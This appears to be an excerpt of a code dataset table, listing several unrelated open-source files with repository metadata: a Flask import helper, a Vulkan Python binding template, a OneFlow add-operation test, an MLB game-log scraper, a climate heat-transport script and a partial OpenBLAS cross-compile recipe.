max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
pf_flask/pff_utils.py | problemfighter/pf-flask | 5 | 12766351 | import os.path
import sys
from functools import reduce
from os.path import exists
from werkzeug.utils import ImportStringError
def import_from_string(import_name: str, silent: bool = False):
    """Import a module or an object from a dotted path string.

    Accepts both ``package.module.attr`` and ``package.module:attr`` forms.
    Returns the imported module/object, or ``None`` when *silent* is True and
    the import fails.  (Adapted from werkzeug's ``import_string``.)
    """
    # Normalise the optional 'module:attr' form to a plain dotted path.
    import_name = import_name.replace(":", ".")
    try:
        try:
            __import__(import_name)
        except ImportError:
            # A bare module name that fails to import is a genuine error;
            # otherwise the last segment may be an attribute, so fall through.
            if "." not in import_name:
                raise
        else:
            # The full dotted path imported cleanly: it names a module.
            return sys.modules[import_name]
        # Split off the final segment and fetch it as an attribute.
        module_name, obj_name = import_name.rsplit(".", 1)
        module = __import__(module_name, globals(), locals(), [obj_name])
        try:
            return getattr(module, obj_name)
        except AttributeError as e:
            raise ImportError(e)
    except ImportError as e:
        if not silent:
            # Preserve the original traceback for easier debugging.
            raise ImportStringError(import_name, e).with_traceback(sys.exc_info()[2])
    return None
def is_url_register(flask_app, url):
    """Return True if *url* exactly matches a rule already registered on *flask_app*."""
    return any(rule.rule == url for rule in flask_app.url_map.iter_rules())
def concat_path(first, last, *more_path):
    """Join two or more path components into a single filesystem path.

    The original implementation re-joined the extra components with
    functools.reduce before joining again; os.path.join already accepts any
    number of components, so delegate to it directly (identical results).
    """
    return os.path.join(first, last, *more_path)
def is_exists_path(path):
    """Tell whether *path* points to an existing file or directory."""
    return os.path.exists(path)
| 2.21875 | 2 |
src/connections/_mqqt.py | Freonius/tranquillity | 0 | 12766352 | from .__interface import IConnection
class Mqqt(IConnection):
    """MQTT connection backend — currently an unimplemented placeholder.

    NOTE(review): the class (and module) name spells 'Mqqt'; presumably 'Mqtt'
    was intended — confirm upstream before renaming, as the file name matches.
    """
    pass
| 1.171875 | 1 |
src/vulkan.template.py | realitix/pyVulkan | 0 | 12766353 | from cffi import *
from pkg_resources import *
from collections import Iterable
from weakref import *
import sys
# Single shared cffi instance, plus a registry that keeps Python-side pointer
# objects alive for as long as the cffi object that references them exists.
ffi = FFI()
_weakkey_dict = WeakKeyDictionary()
def _castToPtr2(x, _type):
    """Cast *x* to a cffi pointer of *_type* (Python 2 variant).

    - An existing cffi object of the pointed-to type is address-of'd.
    - An iterable becomes a newly allocated C array; when the element type is
      itself a pointer, each element is cast recursively and the element
      pointers are kept alive alongside the array via _weakkey_dict.
    - Anything else is cast directly.
    """
    if isinstance(x, ffi.CData):
        if _type.item == ffi.typeof(x):
            return ffi.addressof(x)
        return x
    if isinstance(x, Iterable):
        if _type.item.kind == 'pointer':
            # Array of pointers: cast each element, and tie the element
            # pointers' lifetime to the array itself.
            ptrs = [_castToPtr(i, _type.item) for i in x]
            ret = ffi.new(_type.item.cname + '[]', ptrs)
            _weakkey_dict[ret] = tuple(ptrs)
            return ret
        else:
            return ffi.new(_type.item.cname + '[]', x)
    return ffi.cast(_type, x)
def _castToPtr3(x, _type):
    """Python 3 variant of the pointer cast: encode str to ASCII bytes first,
    then defer to the common implementation."""
    value = x.encode('ascii') if isinstance(x, str) else x
    return _castToPtr2(value, _type)
# Choose the py2/py3 cast helper and load the C declarations.
# resource_string returns bytes; Python 3's cdef needs str, hence the decode.
if sys.version_info < (3, 0):
    ffi.cdef(resource_string(__name__, "_vulkan.h"))
    _castToPtr = _castToPtr2
else:
    ffi.cdef(resource_string(__name__, "_vulkan.h").decode())
    _castToPtr = _castToPtr3

# Open the platform-specific Vulkan loader library.
if sys.platform == 'win32':
    _lib = ffi.dlopen('vulkan-1.dll')
else:
    _lib = ffi.dlopen('libvulkan.so')

# Callback factories matching the PFN_* typedefs from the Vulkan headers.
PFN_vkDebugReportCallbackEXT = ffi.callback('VkBool32(VkFlags, VkDebugReportObjectTypeEXT, uint64_t, size_t, int32_t, const char *, const char *, void *)')
PFN_vkAllocationFunction = ffi.callback('void*(void*, size_t, size_t, VkSystemAllocationScope)')
PFN_vkReallocationFunction = ffi.callback('void*(void*, void*, size_t, size_t, VkSystemAllocationScope)')
PFN_vkFreeFunction = ffi.callback('void(void*, void*)')
PFN_vkInternalAllocationNotification = ffi.callback('void(void*, size_t, VkInternalAllocationType, VkSystemAllocationScope)')
# The free-notification callback shares the allocation-notification signature.
PFN_vkInternalFreeNotification = PFN_vkInternalAllocationNotification
# Jinja template: for every Vulkan enum, emit a class whose attributes are the
# enumerators, then re-export each enumerator at module level.
{% for i in enums %}
class {{i}}:
    {% for k, v in enums[i].relements.items() %}{{k}} = {{v}}
    {% endfor %}
{% for k, v in enums[i].relements.items() %}
{{k}} = {{i}}.{{k}}
{% endfor %}
{% endfor %}
def _newStruct(ctype, **kwargs):
    """Allocate and fill a cffi struct of *ctype* from keyword arguments.

    Falsy/None fields are dropped so cffi zero-initialises them; pointer-typed
    fields are converted with _castToPtr, and the resulting pointers are kept
    alive alongside the struct via _weakkey_dict.
    """
    _type = ffi.typeof(ctype)
    # Drop fields whose value is falsy (left zero-initialised by cffi).
    kwargs = {k: kwargs[k] for k in kwargs if kwargs[k]}
    # Convert pointer-typed fields; non-pointer fields pass through unchanged.
    ptrs = {k: _castToPtr(kwargs[k], dict(_type.fields)[k].type) for k in kwargs if dict(_type.fields)[k].type.kind == 'pointer'}
    ret = ffi.new(_type.cname + '*', dict(kwargs, **ptrs))[0]
    _weakkey_dict[ret] = tuple(ptrs.values())
    return ret
# Jinja template: one factory function per Vulkan struct. Every field becomes
# a keyword argument (defaulting to None or a generated default) forwarded to
# _newStruct.
{% for i, fields in structs.items() %}
def {{i}}({% for j, _ in fields %}{{j}} = {% if j in field_defaults %}{{field_defaults[j](i)}}{% else %}None{% endif %}, {% endfor %}):
    return _newStruct('{{i}}', {% for j, _ in fields %}{{j}} = {{j}}, {% endfor %})
{% endfor %}
class VkException(Exception):
    """Base class for non-fatal Vulkan result codes raised as exceptions."""
class VkError(Exception):
    """Base class for fatal Vulkan error result codes."""
# Jinja template: one concrete exception class per non-success VkResult code,
# deriving from VkException (informational codes) or VkError (error codes).
{% for _, i ,j in exceptions %}
class {{i}}({{j}}):
    pass
{% endfor %}


def _raiseException(ret):
    """Raise the exception class mapped to a non-zero VkResult *ret*."""
    # VkResult code -> exception class; the table body is generated.
    exceptions = {
        {% for i, j, _ in exceptions %}
        {{i}}:{{j}},
        {% endfor %}
    }
    if ret != 0:
        raise exceptions[ret]
def _callApi(fn, *args):
    """Invoke the cffi function *fn*, coercing each Python argument to the
    parameter type cffi expects (None -> NULL, pointer parameters via
    _castToPtr, everything else passed through unchanged)."""
    def _coerce(value, ctype):
        if value is None:
            return ffi.NULL
        if ctype.kind == 'pointer':
            return _castToPtr(value, ctype)
        return value

    param_types = ffi.typeof(fn).args
    return fn(*(_coerce(value, ctype) for value, ctype in zip(args, param_types)))
# Jinja template: one Python wrapper per Vulkan entry point present in the
# loaded library. For array-returning calls Vulkan uses the usual two-call
# protocol: first call with a NULL output pointer to obtain the element count,
# allocate the output array, then call again to fill it. Note the inner
# `{% for i in new_vars %}` reuses the loop name `i`; the shadowing is
# confined to that template loop.
{% for i, (exception_handler, result, result_length, args, inner_args, new_vars) in funcs.items() %}
if hasattr(_lib, '{{i}}'):
    def {{i}}({% for j, k in args %}{{j}}, {% endfor %}):
        {% for i in new_vars %}
        {{i}} = ffi.new('{{new_vars[i]}}')
        {% endfor %}
        {% if result_length and result_length!=1 %}
        ret = _callApi(_lib.{{i}}, {% for j in inner_args[:-1] %}{{j}}, {% endfor %}ffi.NULL)
        {% if exception_handler %}
        _raiseException(ret)
        {% endif %}
        {{result[0]}} = ffi.new('{{result[1].item.cname}}[]', {{result_length}}[0])
        {% endif %}
        ret = _callApi(_lib.{{i}}, {% for j in inner_args %}{{j}}, {% endfor %})
        {% if exception_handler %}
        _raiseException(ret)
        {% endif %}
        {% if result %}
        return {{result[0]}}{% if result_length==1 %}[0]{% endif %}{% endif %}
{% endfor %}
def vkGetInstanceProcAddr(instance, pName):
    """Resolve a Vulkan instance-level function pointer by name."""
    return _callApi(_lib.vkGetInstanceProcAddr, instance, pName)
def vkGetDeviceProcAddr(device, pName):
    """Resolve a Vulkan device-level function pointer by name."""
    return _callApi(_lib.vkGetDeviceProcAddr, device, pName)
# --- Extension name constants mirrored from the C headers ---
VK_KHR_SAMPLER_MIRROR_CLAMP_TO_EDGE_EXTENSION_NAME = "VK_KHR_sampler_mirror_clamp_to_edge"
VK_KHR_SURFACE_EXTENSION_NAME = "VK_KHR_surface"
VK_KHR_sampler_mirror_clamp_to_edge = 1
VK_KHR_SWAPCHAIN_EXTENSION_NAME = "VK_KHR_swapchain"
def VK_MAKE_VERSION(major, minor, patch):
    """Pack a Vulkan version triple into one 32-bit value (10/10/12-bit layout)."""
    return (major << 22) | (minor << 12) | patch
# Header-guard marker mirrored from vulkan.h; VK_ATTACHMENT_UNUSED is the
# all-ones sentinel (~0U in C) expressed here as -1.
VULKAN_H_ = 1
VK_ATTACHMENT_UNUSED = -1
def VK_VERSION_PATCH(version):
    """Extract the patch field (low 12 bits) from a packed Vulkan version."""
    return version & 0x00000FFF
# Special-value sentinels and spec-version constants. The -1 values mirror the
# C headers' ~0U ("whole range" / "remaining" markers).
VK_WHOLE_SIZE = -1
VK_UUID_SIZE = 16
VK_REMAINING_MIP_LEVELS = -1
VK_MAX_MEMORY_TYPES = 32
VK_FALSE = 0
VK_KHR_SURFACE_SPEC_VERSION = 25
VK_KHR_display_swapchain = 1
VK_TRUE = 1
VK_NV_GLSL_SHADER_SPEC_VERSION = 1
VK_NV_GLSL_SHADER_EXTENSION_NAME = "VK_NV_glsl_shader"
VK_EXT_debug_report = 1
VK_EXT_DEBUG_REPORT_SPEC_VERSION = 2
VK_KHR_display = 1
# Legacy alias; the right-hand name is defined by the generated enum section.
VK_STRUCTURE_TYPE_DEBUG_REPORT_CREATE_INFO_EXT = VK_STRUCTURE_TYPE_DEBUG_REPORT_CALLBACK_CREATE_INFO_EXT
VK_KHR_surface = 1
VK_KHR_SAMPLER_MIRROR_CLAMP_TO_EDGE_SPEC_VERSION = 1
VK_API_VERSION = VK_MAKE_VERSION(1, 0, 5)  # Vulkan 1.0.5
VK_MAX_EXTENSION_NAME_SIZE = 256
def VK_VERSION_MINOR(version):
    """Extract the minor field (bits 12-21) from a packed Vulkan version."""
    return (version >> 12) & 0x3FF
VK_QUEUE_FAMILY_IGNORED = -1  # ~0U sentinel: no queue-family ownership transfer
def VK_VERSION_MAJOR(version):
    """Extract the major field (top 10 bits) from a packed Vulkan version."""
    return version >> 22
# Remaining spec versions, limits, and per-platform window-system-integration
# (WSI) surface extension constants.
VK_KHR_DISPLAY_SWAPCHAIN_SPEC_VERSION = 9
VK_LOD_CLAMP_NONE = 1000.0
VK_KHR_DISPLAY_SPEC_VERSION = 21
VK_NULL_HANDLE = 0
VK_MAX_PHYSICAL_DEVICE_NAME_SIZE = 256
VK_REMAINING_ARRAY_LAYERS = -1  # ~0U sentinel: all remaining array layers
VK_KHR_SWAPCHAIN_SPEC_VERSION = 67
VK_VERSION_1_0 = 1
VK_MAX_DESCRIPTION_SIZE = 256
VK_KHR_DISPLAY_SWAPCHAIN_EXTENSION_NAME = "VK_KHR_display_swapchain"
VK_KHR_swapchain = 1
VK_EXT_DEBUG_REPORT_EXTENSION_NAME = "VK_EXT_debug_report"
VK_MAX_MEMORY_HEAPS = 16
VK_SUBPASS_EXTERNAL = -1  # ~0U sentinel: dependency outside the render pass
VK_NV_glsl_shader = 1
VK_KHR_DISPLAY_EXTENSION_NAME = "VK_KHR_display"
VK_KHR_xlib_surface = 1
VK_KHR_XLIB_SURFACE_SPEC_VERSION = 6
VK_KHR_XLIB_SURFACE_EXTENSION_NAME = "VK_KHR_xlib_surface"
VK_KHR_xcb_surface = 1
VK_KHR_XCB_SURFACE_SPEC_VERSION = 6
VK_KHR_XCB_SURFACE_EXTENSION_NAME = "VK_KHR_xcb_surface"
VK_KHR_wayland_surface = 1
VK_KHR_WAYLAND_SURFACE_SPEC_VERSION = 5
VK_KHR_WAYLAND_SURFACE_EXTENSION_NAME = "VK_KHR_wayland_surface"
VK_KHR_mir_surface = 1
VK_KHR_MIR_SURFACE_SPEC_VERSION = 4
VK_KHR_MIR_SURFACE_EXTENSION_NAME = "VK_KHR_mir_surface"
VK_KHR_android_surface = 1
VK_KHR_ANDROID_SURFACE_SPEC_VERSION = 6
VK_KHR_ANDROID_SURFACE_EXTENSION_NAME = "VK_KHR_android_surface"
VK_KHR_win32_surface = 1
VK_KHR_WIN32_SURFACE_SPEC_VERSION = 5
VK_KHR_WIN32_SURFACE_EXTENSION_NAME = "VK_KHR_win32_surface"
python/oneflow/test/modules/test_add.py | Zhangchangh/oneflow | 0 | 12766354 | <filename>python/oneflow/test/modules/test_add.py
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from collections import OrderedDict
import numpy as np
from test_util import GenArgList
import oneflow as flow
import oneflow.unittest
def _test_add_forward(test_case, shape, device):
    """flow.add must match numpy's add for tensor/tensor, scalar/tensor,
    tensor/scalar, single-element broadcast, and shape broadcast inputs."""
    def to_numpy(value):
        return value.numpy() if isinstance(value, flow.Tensor) else value

    def check(x, y):
        of_out = flow.add(x, y)
        np_out = np.add(to_numpy(x), to_numpy(y))
        test_case.assertTrue(np.allclose(of_out.numpy(), np_out, 0.0001, 0.0001))

    def rand_tensor(*dims):
        return flow.Tensor(np.random.randn(*dims), device=flow.device(device))

    check(rand_tensor(*shape), rand_tensor(*shape))           # tensor + tensor
    check(5, rand_tensor(*shape))                             # scalar + tensor
    check(rand_tensor(*shape), 5)                             # tensor + scalar
    check(rand_tensor(*shape),                                # broadcast [5.0]
          flow.Tensor(np.array([5.0]), device=flow.device(device)))
    check(rand_tensor(1, 1), rand_tensor(*shape))             # shape broadcast
def _test_add_backward(test_case, shape, device):
    """The gradient of (5 + y).sum() with respect to y must be all ones."""
    y = flow.Tensor(
        np.random.randn(*shape), requires_grad=True, device=flow.device(device)
    )
    flow.add(5, y).sum().backward()
    test_case.assertTrue(
        np.allclose(y.grad.numpy(), np.ones(shape=shape), 0.0001, 0.0001)
    )
def _test_inplace_add(test_case, shape, device):
    """In-place add (add_ / +=) must keep the tensor's identity, produce the
    expected values, and still propagate gradients to the original leaf."""
    np_x = np.random.randn(*shape)

    def run_case(make_y, expected, inplace_op):
        # Fresh leaf tensor per case, mirroring the original per-section setup.
        of_x = flow.Tensor(
            np_x, dtype=flow.float32, device=flow.device(device), requires_grad=True
        )
        y = make_y()
        target = of_x + 1
        identity_before = id(target)
        result = inplace_op(target, y)
        # The in-place op must return/keep the very same tensor object.
        test_case.assertEqual(identity_before, id(result))
        test_case.assertTrue(np.allclose(result.numpy(), expected(y), 1e-05, 1e-05))
        result.sum().backward()
        test_case.assertTrue(
            np.allclose(of_x.grad.numpy(), np.ones(shape), 1e-05, 1e-05)
        )

    def op_add_(t, y):
        t.add_(y)
        return t

    def op_iadd(t, y):
        t += y
        return t

    def rand_same_shape():
        return flow.Tensor(
            np.random.randn(*shape), device=flow.device(device), requires_grad=False
        )

    # add_ with a Python scalar
    run_case(lambda: 5, lambda y: np_x + 1 + 5, op_add_)
    # add_ with a tensor of the same shape
    run_case(rand_same_shape, lambda y: np_x + 1 + y.numpy(), op_add_)
    # += with a tensor of the same shape
    run_case(rand_same_shape, lambda y: np_x + 1 + y.numpy(), op_iadd)
    # add_ with a single-element tensor broadcast over all entries
    run_case(
        lambda: flow.Tensor(
            np.array([5.0]), device=flow.device(device), requires_grad=False
        ),
        lambda y: np_x + 6,
        op_add_,
    )
    # add_ with a tensor broadcast along the last axis
    np_y = np.random.randn(*shape[:-1], 1)
    run_case(
        lambda: flow.Tensor(np_y, device=flow.device(device), requires_grad=False),
        lambda y: np_x + 1 + np_y,
        op_add_,
    )
@flow.unittest.skip_unless_1n1d()
class TestAddModule(flow.unittest.TestCase):
    """Runs every add test over the cartesian product of shapes and devices."""

    def test_add(test_case):
        # Keyword order is preserved (PEP 468), so the GenArgList ordering
        # matches the original explicit-assignment construction.
        arg_dict = OrderedDict(
            test_fun=[_test_add_forward, _test_add_backward, _test_inplace_add],
            shape=[(2, 3), (2, 3, 4), (2, 3, 4, 5)],
            device=["cpu", "cuda"],
        )
        for arg in GenArgList(arg_dict):
            arg[0](test_case, *arg[1:])
if __name__ == "__main__":
    # Discover and run the TestAddModule cases under the oneflow test runner.
    unittest.main()
| 2.203125 | 2 |
build_logs.py | mayscopeland/open_projections | 0 | 12766355 | <filename>build_logs.py
import pandas as pd
import requests
import datetime
import calendar
from pathlib import Path
def main():
    """Entry point: scrape one month of MLB game logs, then rebuild the
    combined batting/pitching CSV files."""
    build_monthly_gamelogs("2021", "10")
    combine_gamelogs()
def _read_all_csvs(folder):
    """Concatenate every CSV in *folder* into one DataFrame (None when empty)."""
    frames = [pd.read_csv(f, index_col=None, header=0) for f in folder.glob("*.csv")]
    if not frames:
        # pd.concat raises on an empty list; signal "nothing to combine" instead.
        return None
    return pd.concat(frames, axis=0, ignore_index=True)


def combine_gamelogs():
    """Merge the per-date CSVs under stats/batting and stats/pitching into
    single batting.csv / pitching.csv files, adding a quality-start (QS)
    column to the pitching data.

    Fixes: the batting and pitching read-loops were duplicated verbatim, and
    an empty stats folder crashed pd.concat.
    """
    filepath = Path(__file__).parent

    batting = _read_all_csvs(filepath / "stats" / "batting")
    if batting is not None:
        batting.to_csv(filepath / "stats" / "batting.csv", index=False)

    pitching = _read_all_csvs(filepath / "stats" / "pitching")
    if pitching is not None:
        pitching["QS"] = pitching.apply(quality_start, axis=1)
        pitching.to_csv(filepath / "stats" / "pitching.csv", index=False)
def quality_start(s):
    """Return 1 when row *s* records a quality start — a game started (GS > 0)
    with at least six innings pitched and three or fewer earned runs — else 0."""
    is_quality = s["GS"] > 0 and s["IP"] >= 6 and s["ER"] <= 3
    return 1 if is_quality else 0
def build_yearly_gamelogs(year):
    """Build game logs for every month of *year* (a year string like "2014").

    Replaces the hand-written twelve-element month-string list with a
    formatted range — same "01".."12" values, nothing to keep in sync.
    """
    for month in range(1, 13):
        build_monthly_gamelogs(year, "{:02d}".format(month))
def build_monthly_gamelogs(year, month):
    """Build daily game logs for each calendar day of *year*/*month* (strings)."""
    y, m = int(year), int(month)
    days_in_month = calendar.monthrange(y, m)[1]
    for day in range(1, days_in_month + 1):
        build_daily_gamelogs(datetime.date(y, m, day).strftime("%Y-%m-%d"))
def build_daily_gamelogs(date_string):
    """Fetch and write per-player batting/pitching logs for one date
    ("YYYY-MM-DD"), skipping dates whose batting CSV already exists.

    Fixes: DataFrame.append (deprecated since pandas 1.4, removed in 2.0)
    is replaced by collecting per-game frames and concatenating once — also
    avoiding quadratic re-copying.
    """
    filename = date_string + ".csv"
    batting_file = Path(__file__).parent / "stats" / "batting" / filename
    pitching_file = Path(__file__).parent / "stats" / "pitching" / filename
    if batting_file.is_file():
        return  # already scraped this date

    print(date_string)
    # One schedule lookup, then one boxscore fetch per finished game.
    games = get_games(date_string)

    batting_frames = []
    pitching_frames = []
    for game in games:
        game_batting, game_pitching = get_game_logs(game)
        batting_frames.append(pd.DataFrame(game_batting))
        pitching_frames.append(pd.DataFrame(game_pitching))

    if games:
        pd.concat(batting_frames, ignore_index=True).to_csv(batting_file, index=False)
        pd.concat(pitching_frames, ignore_index=True).to_csv(pitching_file, index=False)
def get_games(date_string):
    """Return metadata dicts for every *finished* game on *date_string*,
    querying the MLB stats API schedule across MLB and minor-league levels."""
    sport_ids = (1, 11, 12, 13, 14, 16, 17)
    games = []
    for sport_id in sport_ids:
        url = "https://statsapi.mlb.com/api/v1/schedule/?sportId={}&date={}".format(
            sport_id,
            date_string
        )
        schedule = requests.get(url).json()
        for date in schedule["dates"]:
            for game_data in date["games"]:
                # Skip games that are not finished ("F"); a delayed game shows
                # up again on a later calendar date.
                if game_data["status"]["codedGameState"] != "F":
                    continue
                games.append({
                    "date": date_string,
                    "game_id": game_data["gamePk"],
                    "game_type": game_data["gameType"],
                    "venue_id": game_data["venue"]["id"],
                    "league_id": sport_id,
                })
    return games
# CSV column -> MLB statsapi field name, in output-column order.
_BATTING_FIELDS = [
    ("AB", "atBats"), ("R", "runs"), ("H", "hits"), ("2B", "doubles"),
    ("3B", "triples"), ("HR", "homeRuns"), ("RBI", "rbi"),
    ("SB", "stolenBases"), ("CS", "caughtStealing"), ("BB", "baseOnBalls"),
    ("SO", "strikeOuts"), ("IBB", "intentionalWalks"), ("HBP", "hitByPitch"),
    ("SH", "sacBunts"), ("SF", "sacFlies"), ("GIDP", "groundIntoDoublePlay"),
]
_PITCHING_FIELDS = [
    ("W", "wins"), ("L", "losses"), ("G", "gamesPlayed"), ("GS", "gamesStarted"),
    ("CG", "completeGames"), ("SHO", "shutouts"), ("SV", "saves"),
    ("HLD", "holds"), ("BFP", "battersFaced"), ("IP", "inningsPitched"),
    ("H", "hits"), ("ER", "earnedRuns"), ("R", "runs"), ("HR", "homeRuns"),
    ("SO", "strikeOuts"), ("BB", "baseOnBalls"), ("IBB", "intentionalWalks"),
    ("HBP", "hitByPitch"), ("WP", "wildPitches"), ("BK", "balks"),
]


def _base_log(game, player):
    """Shared leading columns for both batting and pitching log rows."""
    return {
        "date": game["date"],
        "game_id": game["game_id"],
        "game_type": game["game_type"],
        "venue_id": game["venue_id"],
        "league_id": game["league_id"],
        "player_id": player["person"]["id"],
    }


def get_game_logs(game):
    """Fetch the boxscore for *game* and return (batting_logs, pitching_logs),
    one dict per player per side of the ball.

    The original spelled out every stat assignment by hand (~40 near-identical
    lines); the field tables above replace that duplication while keeping the
    exact column order. Batting keeps direct indexing (KeyError on a missing
    field), pitching keeps .get(..., "") defaults, as before.
    """
    batting_logs = []
    pitching_logs = []
    url = "https://statsapi.mlb.com/api/v1/game/{}/boxscore".format(game["game_id"])
    game_info = requests.get(url).json()
    for team in game_info["teams"].values():
        for player in team["players"].values():
            batting = player["stats"]["batting"]
            if batting:
                batting_log = _base_log(game, player)
                batting_log["batting_order"] = player.get("battingOrder", "")
                for column, field in _BATTING_FIELDS:
                    batting_log[column] = batting[field]
                batting_logs.append(batting_log)
            pitching = player["stats"]["pitching"]
            if pitching:
                pitching_log = _base_log(game, player)
                for column, field in _PITCHING_FIELDS:
                    pitching_log[column] = pitching.get(field, "")
                pitching_logs.append(pitching_log)
    return batting_logs, pitching_logs
if __name__ == "__main__":
    main()
compute_ht.py | ddocquier/OSeaIce | 0 | 12766356 | <reponame>ddocquier/OSeaIce
#!/usr/bin/env python
'''
GOAL
Compute meridional total heat transport
PROGRAMMER
<NAME>
LAST UPDATE
19/11/2020
'''
# Options
exp = 'D023'      # experiment identifier used in all input/output file names
save_var = True   # write the computed transports to a .npy file at the end
# Standard libraries
from netCDF4 import Dataset
import numpy as np
from scipy import integrate
import matplotlib.pyplot as plt
# Working directories
dir_input = '/nobackup/rossby24/proj/rossby/joint_exp/oseaice/post-proc/' + str(exp) + '/'
dir_output = dir_input  # outputs are written next to the inputs
# Function to compute total heat transport in PW - adapted from B. Rose,
# http://www.atmos.albany.edu/facstaff/brose/classes/ATM623_Spring2015/Notes/Lectures/Lecture13%20--%20Heat%20transport.html
def inferred_heat_transport(energy_in, lat_deg):
    """Infer the cumulative meridional heat transport implied by *energy_in*.

    Parameters
    ----------
    energy_in : array_like
        Zonal-mean net energy flux into the column (W/m^2), one value per
        latitude, ordered like *lat_deg*.
    lat_deg : array_like
        Latitudes in degrees, monotonically increasing from the starting pole.

    Returns
    -------
    numpy.ndarray
        Heat transport in petawatts (PW), zero at the first latitude.

    Fixes: ``np.math.pi`` relied on an accidental alias removed in NumPy 2.0
    (use ``np.pi``); ``scipy.integrate.cumtrapz`` was removed in SciPy 1.14
    (renamed ``cumulative_trapezoid``) — resolved with a fallback for old
    SciPy installations.
    """
    lat_rad = np.deg2rad(lat_deg)
    earth_radius = 6.371e6  # Earth radius (m)
    cumulative_trapezoid = getattr(
        integrate, "cumulative_trapezoid", getattr(integrate, "cumtrapz", None)
    )
    ht = 2.0 * np.pi * earth_radius ** 2 * cumulative_trapezoid(
        np.cos(lat_rad) * energy_in, x=lat_rad, initial=0.0
    )
    return ht / 1.e15  # W -> PW
# Load top net solar (shortwave) radiation (J/m^2, positive downwards)
filename = dir_input + 'tsr_' + str(exp) + '_2130.nc'
fh = Dataset(filename, mode='r')
tsr = fh.variables['var178'][:]
lat = fh.variables['lat'][:]
fh.close()
nm, ny, nx = tsr.shape  # (time, latitude, longitude)

# Load top net thermal (longwave) radiation (J/m^2, positive downwards)
filename = dir_input + 'ttr_' + str(exp) + '_2130.nc'
fh = Dataset(filename, mode='r')
ttr = fh.variables['var179'][:]
fh.close()

# Load restoring flux (W/m^2); the control run D000 has no flux correction.
if exp != 'D000':
    filename = dir_input + 'hfcorr_ifs_' + str(exp) + '_2130-2179.nc'
    fh = Dataset(filename, mode='r')
    hfcorr = fh.variables['hfcorr'][:]
    # Zero out fill values.
    hfcorr[hfcorr > 1.e10] = 0.
    hfcorr[hfcorr < -1.e10] = 0.
    fh.close()

# Load surface ocean heat flux (W/m^2)
filename = dir_input + 'qtoce_ifs_' + str(exp) + '_2130.nc'
fh = Dataset(filename, mode='r')
ohfl = fh.variables['qt_oce'][:]
ohfl[ohfl > 1.e10] = 0.
ohfl[ohfl < -1.e10] = 0.
fh.close()

# Convert accumulated radiation from J/m^2 to W/m^2; the accumulation window
# differs by run (D000 writes every 6 h, the others every 12 h).
if exp == 'D000':  # Output every 6h
    tsr = tsr / (6 * 3600)
    ttr = ttr / (6 * 3600)
else:  # Output every 12h
    tsr = tsr / (12 * 3600)
    ttr = ttr / (12 * 3600)

# Zonal means (average over longitude, axis 2)
tsr_mean = np.nanmean(tsr, axis=2)
ttr_mean = np.nanmean(ttr, axis=2)
ohfl_mean = np.nanmean(ohfl, axis=2)
if exp != 'D000':
    # Fold the restoring flux into the ocean heat flux.
    hfcorr_mean = np.nanmean(hfcorr, axis=2)
    ohfl_mean = ohfl_mean + hfcorr_mean

# Compute top net downward radiation (sum of solar and thermal radiation)
Rt = tsr_mean + ttr_mean

# Compute surface net heat flux into the atmosphere (correction excluded)
if exp != 'D000':
    Fatmin = Rt - (ohfl_mean - hfcorr_mean)
else:
    Fatmin = Rt - ohfl_mean

# Compute total, atmospheric and ocean heat transports from the South Pole:
# flip latitude so the cumulative integration starts at the southern end.
lat = np.flip(lat)
Rt = np.flip(Rt, 1)
Fatmin = np.flip(Fatmin, 1)
ohfl_mean = np.flip(ohfl_mean, 1)
ht_total = np.zeros((nm, ny))
aht = np.zeros((nm, ny))
oht = np.zeros((nm, ny))
for t in np.arange(nm):
    ht_total[t, :] = inferred_heat_transport(Rt[t, :], lat)
    aht[t, :] = inferred_heat_transport(Fatmin[t, :], lat)
    oht[t, :] = inferred_heat_transport(ohfl_mean[t, :], lat)

# Save variables
if save_var == True:
    filename = dir_output + 'ht_' + str(exp) + '.npy'
    np.save(filename, [ht_total, aht, oht, lat])
| 2.21875 | 2 |
hardhat/recipes/mingw64/mingw64_openblas.py | stangelandcl/hardhat | 0 | 12766357 | import os
import shutil
from sys import platform
from .base import Mingw64BaseRecipe
from hardhat.urls import Urls
from hardhat.util import patch
class Mingw64OpenBlasRecipe(Mingw64BaseRecipe):
    """Cross-compiles OpenBLAS for 64-bit Windows with the mingw-w64 toolchain.

    OpenBLAS's build runs small target-detection binaries (getarch), which are
    Windows executables here; patch() reroutes them through wine64.
    """

    def __init__(self, *args, **kwargs):
        super(Mingw64OpenBlasRecipe, self).__init__(*args, **kwargs)
        # Expected SHA-256 of the source archive.
        self.sha256 = 'c4f71a60e3f23a7a25693390af3be230' \
                      '8d374749ae3cb0bcfd8aab33a3c9ac09'
        # depends on wine but self.depends = ['wine'] doesn't work
        self.name = 'mingw64-openblas'
        # Pinned to a specific upstream commit rather than a release tag.
        self.version = 'fd4e68128e56beb3b97f37178edf07bef7ade5f1'
        self.url = Urls.github_commit('xianyi', 'OpenBLAS',
                                      self.version)
        # self.filename = os.path.join(self.tarball_dir,
        #                              'openblas-%s.tar.gz' % self.version)
        self.libname = 'libopenblas.a'
        # Drop the inherited C++/preprocessor flags; only plain optimisation
        # flags are set for the C and Fortran compilers below.
        del self.environment['CPPFLAGS']
        del self.environment['CXXFLAGS']
        self.environment['CFLAGS'] = '-fomit-frame-pointer' \
                                     ' -funroll-loops'
        self.environment['FFLAGS'] = '-fomit-frame-pointer' \
                                     ' -funroll-loops'
        # Point the build at the mingw-w64 cross Fortran compiler.
        os.environ['GFORTRAN'] = 'x86_64-w64-mingw32-gfortran'
        # NOTE(review): 'FC=gfortran' is immediately overridden by the
        # 'FC=%s' % GFORTRAN entry below — confirm the first entry is needed.
        self.compile_args += ['USE_THREAD=1',
                              'FC=gfortran',
                              # 'CC=%s' % os.environ['CC'],
                              'FC=%s' % os.environ['GFORTRAN'],
                              'BINARY=64',
                              # 'HOSTCC=%s' % os.environ['CC'],
                              # 'AS=%s' % os.environ['AS'],
                              # 'CROSS=1',
                              # 'LD=%s' % os.environ['LD'],
